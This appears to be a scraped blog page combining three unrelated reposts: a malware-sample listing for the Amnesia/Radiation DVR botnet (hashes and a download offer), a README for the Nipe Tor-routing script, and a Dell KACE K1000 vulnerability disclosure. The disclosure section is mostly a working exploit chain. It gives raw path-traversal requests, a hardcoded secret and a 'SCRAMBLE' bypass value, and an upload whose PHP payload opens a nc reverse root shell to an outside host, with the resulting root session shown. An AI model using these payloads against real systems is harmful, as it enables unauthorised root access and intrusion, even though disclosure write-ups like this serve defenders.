wazee

@m!r

Reference

Amnesia / Radiation botnet samples targeting Remote Code Execution in CCTV DVR

2017-04-06 Palo Alto Unit 42. New IoT/Linux Malware Targets DVRs, Forms Botnet

2016-08-11 CyberX Radiation IoT Cybersecurity campaign

Download

Other malware

Download. Email me if you need the password (see in my profile)

Hashes

MD5	SHA256	SHA1
74bf554c4bc30d172cf1d73ac553d766	06d30ba7c96dcaa87ac584c59748708205e813a4dffa7568c1befa52ae5f0374	3c40221177383da576b11a0b3f6b35d68a9cde74
5dd9056e5ab6a92e61822b6c04afd346	10aa7b3863f34d340f960b89e64319186b6ffb5d2f86bf0da3f05e7dbc5d9653	c865dd67853a24fd86ef74b05140827c1d5fd0bd
2b486466f4d3e30f7b22d0bc76cb68f9	175fe89bbc8e44d45f4d86e0d96288e1e868524efa260ff07cb63194d04ea575	ed62f6d1588bea33c20ababb42c02662d93d6015
3411bb2965f4c3d52c650aff04f48e52	1d8bc81acbba0fc56605f60f5a47743491d48dab43b97a40d4a7f6c21caca12a	1e0281178b4a9d8dec74f50a7850867c87837435
34f915ac414e9aad2859217169f9a3aa	2f9cd1d07c535aae41d5eed1f8851855b95b5b38fb6fe139b5f1ce43ed22df22	d66f1e47c983a8d30ad7fd30cd08db8cd29a92b0
59e08f2ce1c3e55e2493baf36c1ad3c6	327f24121d25ca818cf8414c1cc704c3004ae63a65a9128e283d64be03cdd42e	90d45b81e9a97ddcc9911122f4e8fd439ccc8fa9
f4bc173bf80d922da4e755896af0db61	37b2b33a8e344efcaca0abe56c6163ae64026ccef65278b232a9170ada1972af	fab32f8c3ce3a837e80a1d98ada41a5bf39b01e7
a253273e922ce93e2746a9791798e3fe	3a595e7cc8e32071781e36bbbb680d8578ea307404ec07e3a78a030574da8f96	99cfdec405f6a9f43d58b1856fce7ca3445395d3
335e322c56278e258e4d7b5e17ad98e6	4313af898c5e15a68616f8c40e8c7408f39e0996a9e4cc3e22e27e7aeb2f8d54	504022707609a0fec9cbb21005cb0875be2a4726
93522e5f361a051f568bd1d74d901d30	46ea20e3cf34d1d4cdfd797632c47396d9bdc568a75d550d208b91caa7d43a9b	e7fc96b2a92888572de2539f227c9a6625449f83
c86af536d87c1e5745e7d8c9f44fd25d	4b0feb1dd459ade96297b361c69690ff69e97ca6ee5710c3dc6a030261ba69e0	6ef69a683913ae650634aedc40af8d595c45cb4f
90c7c5e257c95047dbf52bbfbe011fd6	4db9924decd3e578a6b7ed7476e499f8ed792202499b360204d6f5b807f881b8	1c3a9be6ae9300aaad00fb87d5407ed6e84ec80b
7c0528e54b086e5455ef92218ea23d03	5e6896b39c57d9609dc1285929b746b06e070886809692a4ac37f9e1b53b250c	868abc912ff2fdcd733ff1da87e48e7d4c288a73
6405b42d2c7e42244ac73695bb7bfe6b	64f03fff3ed6206337332a05ab9a84282f85a105432a3792e20711b920124707	173aca65181c8da84e062c803a43a404ad49302d
6441157813de77d9849da5db9987d0bb	6b2885a4f8c9d84e5dc49830abf7b1edbf1b458d8b9d2bafb680370106f93bc3	92dff9bdb31d3b9480d9e5f72a307715859dd094
614ea66b907314398cc14b3d2fdebe79	6b29b65c3886b6734df788cfc6628fbee4ce8921e3c0e8fc017e4dea2da0fd0b	c7e71c42d391f9c69375505dbf3767ba967f9103
00fe3120a666a85b84500ded1af8fb61	885dce73237c4d7b4d481460baffbd5694ab671197e8c285d53b551f893d6c09	342ed67e08d16ab982a4012fcecdca060a5da46b
5477de039f7838dea20d3be1ae249fcb	886136558ec806da5e70369ee22631bfb7fa06c27d16c987b6f6680423bc84b0	5b19202b45e5a58cadec8c2efa40fd924b64177d
91bf10249c5d98ea6ae11f17b6ef0970	8f57ec9dfba8cf181a723a6ac2f5a7f50b4550dd33a34637cf0f302c43fd0243	682dab9ec3ff0b629cce4e16c9c74171dd2551d4
fb0a7e12d2861e8512a38a6cdef3ddf0	9351ee0364bdbb5b2ff7825699e1b1ee319b600ea0726fd9bb56d0bd6c6670cb	c077c490bb22df9886475dc5bedfc6c032061024
9b7f5a1228fa66cbd35e75fb774fdc8e	9c7a5239601a361b67b1aa3f19b462fd894402846f635550a1d63bee75eab0a2	ae89bc6c5cc1818b3136a40961462327c3dececc
5b97d54dc5001eb7cf238292405070a6	a010bf82e2c32cba896e04ec8dbff58e32eee9391f6986ab22c612165dad36a0	96d2194f5f3927de75605f6ca6110fe683383a01
642f523bb46c2e901416047dca1c5d4e	ad65c9937a376d9a53168e197d142eb27f04409432c387920c2ecfd7a0b941c8	bbf667213a446bc9bc4a5a2e54e7391752e3a9b8
c617655312c573ecb01d292b320fff2e	aeb480cf01696b7563580b77605558f9474c34d323b05e5e47bf43ff16b67d6a	de102a6f35e08f18aa0c58358f5b22871eb0a45f
c8835a3d385162ae02bd4cb6c5ebac87	b113ec41cc2fd9be9ac712410b9fd3854d7d5ad2dcaac33af2701102382d5815	831eb9cf0dcd57a879c04830e54a3b85fe5d6229
1497740fa8920e4af6aa981a5b405937	b13014435108b34bb7cbcef75c4ef00429b440a2adf22976c31a1645af531252	8d6b90f0b88b1ad5dcc87d377e6a82dc6ac64211
5e925e315ff7a69c2f2cf1556423d5af	b3d0d0e2144bd1ddd27843ef65a2fce382f6d590a8fee286fda49f8074711545	64fe900b3a2b030c28211404afa45703c6869dea
951ec487fb3fece58234677d7fe3e4dc	bdefa773e3f09cdc409f03a09a3982f917a0cc656b306f0ece3dd1a2564a8772	0b03d9471522590530dd90ad30b2d235ec98b578
3e84998197fc25cbac57870e3cdeb2de	c03b403d5de9778a2ec5949d869281f13976c2fc5b071e0f5f54277680c80902	0b9eb6d931dc6b226a913e89bb422f58228de0d0
c3a73d24df62057e299b6af183889e6b	cb2382b818993ef6b8c738618cc74a39ecab243302e13fdddb02943d5ba79483	6a683ef6f7653e5ee64969cbbbe4403601ae9ded
d428f50a0f8cd57b0d8fe818ace6af20	ce61dcfc3419ddef25e61b6d30da643a1213aa725d579221f7c2edef40ca2db3	9bd832256b94e43546dfb77532f6d70fcd1ce874
e1d6d4564b35bb19d2b85ca620d7b8f2	d0bda184dfa31018fe999dfd9e1f99ca0ef502296c2cccf454dde30e5d3a9df9	c1af00d3263893b5d23dbf38015fe3c6a92cefaf
e9502ae7b0048b9ea25dd7537818904c	e7d6b3e1fba8cdf2f490031e8eb24cd515a30808cdd4aa15c2a41aa0016f8082	0e080ac0130ab3f7265df01b8397e4abd13c38cb
8eb34e1fb7dd9d9f0e1fef2803812759	eb54dc959b3cc03fbd285cef9300c3cd2b7fe86b4adeb5ca7b098f90abb55b8a	5310a99f0f8c92bfa2f8da87e60c645f2cae305a
ca0fc25ce066498031dc4ca3f72de4b8	f23fecbb7386a2aa096819d857a48b853095a86c011d454da1fb8e862f2b4583	7f4d97eea294fc567b058b09cc915be56c2a80e1
5a2fcfff8d6aab9a0abe9ca97f6093ed	f6af2fa4f987df773d37d9bb44841a720817ce3817dbf1e983650b5af9295a16	f4ddf49fbf23edb23f50be62637a4a688e352057
ed98e8fa385b39ca274e0de17b1007e6	f7a737cb73802d54f7758afe4f9d0a7d2ea7fda4240904c0a79abae732605729	a69d4c2b88bfe3a06245f8fbfb8abe5e9a894cec
320db5f1230fcfe0672c8515eb9ddcfc	f7cf1e0d7756d1874630d0d697c3b0f3df0632500cff1845b6308b11059deb07	8d40dbf34a02dd43a81e5cdc58a0b11bfa9f5663
18d6af9211d0477f9251cf9524f898f3	f97848514b63e9d655a5d554e62f9e102eb477c5767638eeec9efd5c6ad443d8	b0e76be186fd609d5a8a33d59d16ffa3bdab1573

Related links

@m!r

Tor enables users to surf the Internet, chat and send instant messages anonymously, and is used by a wide variety of people for both Licit and Illicit purposes. Tor has, for example, been used by criminals enterprises, Hacktivism groups, and law enforcement agencies at cross purposes, sometimes simultaneously.

Nipe is a Script to make Tor Network your Default Gateway.

This Perl Script enables you to directly route all your traffic from your computer to the Tor Network through which you can surf the Internet Anonymously without having to worry about being tracked or traced back.

Download and install:

    git clone https://github.com/GouveaHeitor/nipe
    cd nipe
    cpan install Switch JSON LWP::UserAgent

Commands:

    COMMAND          FUNCTION
    install          Install dependencies
    start            Start routing
    stop             Stop routing
    restart          Restart the Nipe process
    status           See status

    Examples:

    perl nipe.pl install
    perl nipe.pl start
    perl nipe.pl stop
    perl nipe.pl restart
    perl nipe.pl status

Bugs

Report bugs in my email: [hi@heitorgouvea.me]

Download Nipe

More information

@m!r

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:

POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini ;
;;;;;;;;;;;;;;;;;;;

That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:

http://targethost/service/kbot_upload.php

This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

$checksumFn = $_GET['filename'];
$fn = rawurldecode($_GET['filename']);
$machineId = $_GET['machineId'];
$checksum = $_GET['checksum'];
$mac = $_GET['mac'];
$kbotId = $_GET['kbotId'];
$version = $_GET['version'];
$patchScheduleId = $_GET['patchscheduleid'];
if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
."($machineId, $checksumFn, $mac)");
KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
."from HandlePUT(".construct_url($_GET).")");
header("Status: 500", true, 500);
return;
}

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:

private static function calcTokenChecksum($filename, $machineId, $mac)
{
//return md5("$filename $machineId $mac" . $ip .
// 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

// our tracking of ips really sucks and when I'm vpn'ed from
// home I couldn't get patching to work, cause the ip that
// was on the machine record was different from the
// remote server ip.
return md5("$filename $machineId $mac" .
'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
}

The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server.

In addition to this "calcTokenChecksum" check, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):

if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {

Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").

The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:

POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 190
<?php
require_once 'KSudoClient.class.php';
KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?>

Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:

http://targethost/service/tmp/db.php

On our host:

~$ ncat -lkvp 4444
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from XX.XX.XX.XX
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)

So at the end of the the day the count looks like this:

Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1

That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:

wazee

Sunday, August 30, 2020

Amnesia / Radiation Linux Botnet Targeting Remote Code Execution In CCTV DVR Samples

Related links

Nipe - A Script To Make TOR Network Your Default Gateway

The Curious Case Of The Ninjamonkeypiratelaser Backdoor

Related links

Blog Archive

Contributors